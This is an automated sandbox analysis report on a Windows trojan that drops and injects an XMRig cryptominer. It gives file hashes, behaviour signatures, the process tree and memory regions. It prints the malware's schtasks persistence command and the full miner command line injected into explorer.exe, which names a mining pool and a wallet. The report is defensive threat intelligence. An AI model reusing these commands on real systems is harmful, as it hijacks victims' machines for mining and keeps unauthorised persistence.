Analysis
-
max time kernel
132s -
max time network
129s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
16-07-2021 16:01
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
Resource
win7v20210410
General
-
Target
SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
-
Size
2.1MB
-
MD5
73ab4524d40fd3f991dd0b12646772e1
-
SHA1
f1391279800f539282edaf04f636642d6569a7d8
-
SHA256
d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6
-
SHA512
4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1988-92-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/1988-93-0x00000001402EB66C-mapping.dmp xmrig behavioral1/memory/1988-95-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 3 IoCs
Processes:
sihost64.exeServices64System.exesihost64.exepid process 396 sihost64.exe 1128 Services64System.exe 1572 sihost64.exe -
Loads dropped DLL 3 IoCs
Processes:
SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exeServices64System.exepid process 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe 1128 Services64System.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Services64System.exedescription pid process target process PID 1128 set thread context of 1988 1128 Services64System.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exeServices64System.exepid process 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe 1128 Services64System.exe 1128 Services64System.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exeServices64System.exeexplorer.exedescription pid process Token: SeDebugPrivilege 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe Token: SeDebugPrivilege 1128 Services64System.exe Token: SeLockMemoryPrivilege 1988 explorer.exe Token: SeLockMemoryPrivilege 1988 explorer.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.execmd.exeServices64System.execmd.exedescription pid process target process PID 768 wrote to memory of 1368 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe cmd.exe PID 768 wrote to memory of 1368 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe cmd.exe PID 768 wrote to memory of 1368 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe cmd.exe PID 1368 wrote to memory of 832 1368 cmd.exe schtasks.exe PID 1368 wrote to memory of 832 1368 cmd.exe schtasks.exe PID 1368 wrote to memory of 832 1368 cmd.exe schtasks.exe PID 768 wrote to memory of 396 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe sihost64.exe PID 768 wrote to memory of 396 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe sihost64.exe PID 768 wrote to memory of 396 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe sihost64.exe PID 768 wrote to memory of 1128 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe Services64System.exe PID 768 wrote to memory of 1128 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe Services64System.exe PID 768 wrote to memory of 1128 768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe Services64System.exe PID 1128 wrote to memory of 1220 1128 Services64System.exe cmd.exe PID 1128 wrote to memory of 1220 1128 Services64System.exe cmd.exe PID 1128 wrote to memory of 1220 1128 Services64System.exe cmd.exe PID 1220 wrote to memory of 1652 1220 cmd.exe schtasks.exe PID 1220 wrote to memory of 1652 1220 cmd.exe schtasks.exe PID 1220 wrote to memory of 1652 1220 cmd.exe schtasks.exe PID 1128 wrote to memory of 1572 1128 Services64System.exe sihost64.exe PID 1128 wrote to memory of 1572 1128 Services64System.exe sihost64.exe PID 1128 wrote to memory of 1572 1128 Services64System.exe sihost64.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe PID 1128 wrote to memory of 1988 1128 Services64System.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"'3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Services64System.exe"C:\Users\Admin\AppData\Roaming\Services64System.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.minexmr.com:4444 --user=45xUdHPiFHQ7xbKh19G45saF1raB2ot5pag8p1Hnk4yrfXRJZskr8TMbFpVfC5tDk8eQQg63TqkW9gKhwagx6HePTaK2yXb --pass= --cpu-max-threads-hint=0 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=100 --cinit-stealth3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sysMD5
0c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
e5e9669aa667d6e2b8298fe086ec0026
SHA1133e5cd7196fb848ed4139573c2b62b3cb243814
SHA25682258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11
SHA51286e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
e5e9669aa667d6e2b8298fe086ec0026
SHA1133e5cd7196fb848ed4139573c2b62b3cb243814
SHA25682258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11
SHA51286e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
e5e9669aa667d6e2b8298fe086ec0026
SHA1133e5cd7196fb848ed4139573c2b62b3cb243814
SHA25682258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11
SHA51286e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
e5e9669aa667d6e2b8298fe086ec0026
SHA1133e5cd7196fb848ed4139573c2b62b3cb243814
SHA25682258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11
SHA51286e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97
-
C:\Users\Admin\AppData\Roaming\Services64System.exeMD5
73ab4524d40fd3f991dd0b12646772e1
SHA1f1391279800f539282edaf04f636642d6569a7d8
SHA256d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6
SHA5124cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b
-
C:\Users\Admin\AppData\Roaming\Services64System.exeMD5
73ab4524d40fd3f991dd0b12646772e1
SHA1f1391279800f539282edaf04f636642d6569a7d8
SHA256d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6
SHA5124cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b
-
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
e5e9669aa667d6e2b8298fe086ec0026
SHA1133e5cd7196fb848ed4139573c2b62b3cb243814
SHA25682258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11
SHA51286e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97
-
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
e5e9669aa667d6e2b8298fe086ec0026
SHA1133e5cd7196fb848ed4139573c2b62b3cb243814
SHA25682258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11
SHA51286e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97
-
\Users\Admin\AppData\Roaming\Services64System.exeMD5
73ab4524d40fd3f991dd0b12646772e1
SHA1f1391279800f539282edaf04f636642d6569a7d8
SHA256d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6
SHA5124cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b
-
memory/396-78-0x0000000000650000-0x0000000000652000-memory.dmpFilesize
8KB
-
memory/396-74-0x000000013FF00000-0x000000013FF01000-memory.dmpFilesize
4KB
-
memory/396-67-0x0000000000000000-mapping.dmp
-
memory/396-80-0x000000001ADC0000-0x000000001ADC2000-memory.dmpFilesize
8KB
-
memory/768-60-0x000000013F500000-0x000000013F501000-memory.dmpFilesize
4KB
-
memory/768-63-0x000000001BA90000-0x000000001BA92000-memory.dmpFilesize
8KB
-
memory/768-62-0x000000001C2D0000-0x000000001C4EC000-memory.dmpFilesize
2.1MB
-
memory/832-65-0x0000000000000000-mapping.dmp
-
memory/1128-75-0x000000013F920000-0x000000013F921000-memory.dmpFilesize
4KB
-
memory/1128-71-0x0000000000000000-mapping.dmp
-
memory/1128-81-0x000000001AC20000-0x000000001AC22000-memory.dmpFilesize
8KB
-
memory/1128-91-0x0000000002410000-0x000000000241A000-memory.dmpFilesize
40KB
-
memory/1220-82-0x0000000000000000-mapping.dmp
-
memory/1368-64-0x0000000000000000-mapping.dmp
-
memory/1572-89-0x000000013F5F0000-0x000000013F5F1000-memory.dmpFilesize
4KB
-
memory/1572-85-0x0000000000000000-mapping.dmp
-
memory/1572-101-0x000000001BA50000-0x000000001BA52000-memory.dmpFilesize
8KB
-
memory/1652-83-0x0000000000000000-mapping.dmp
-
memory/1988-94-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB
-
memory/1988-93-0x00000001402EB66C-mapping.dmp
-
memory/1988-95-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1988-96-0x00000000001D0000-0x00000000001F0000-memory.dmpFilesize
128KB
-
memory/1988-97-0x00000000001F0000-0x0000000000210000-memory.dmpFilesize
128KB
-
memory/1988-98-0x00000000001D0000-0x00000000001F0000-memory.dmpFilesize
128KB
-
memory/1988-99-0x00000000001F0000-0x0000000000210000-memory.dmpFilesize
128KB
-
memory/1988-92-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB